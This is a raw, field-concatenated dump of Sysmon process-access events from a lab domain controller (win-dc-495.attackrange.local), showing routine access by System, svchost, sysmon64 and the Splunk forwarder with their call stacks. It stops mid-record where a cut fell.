10341000x80000000000000009267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.859{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000009266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:39.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:44.609{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9324-6005-C904-00000000A301}4520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:44.609{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:44.609{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:44.609{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:44.609{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:44.609{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:44.609{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:44.609{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:44.609{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.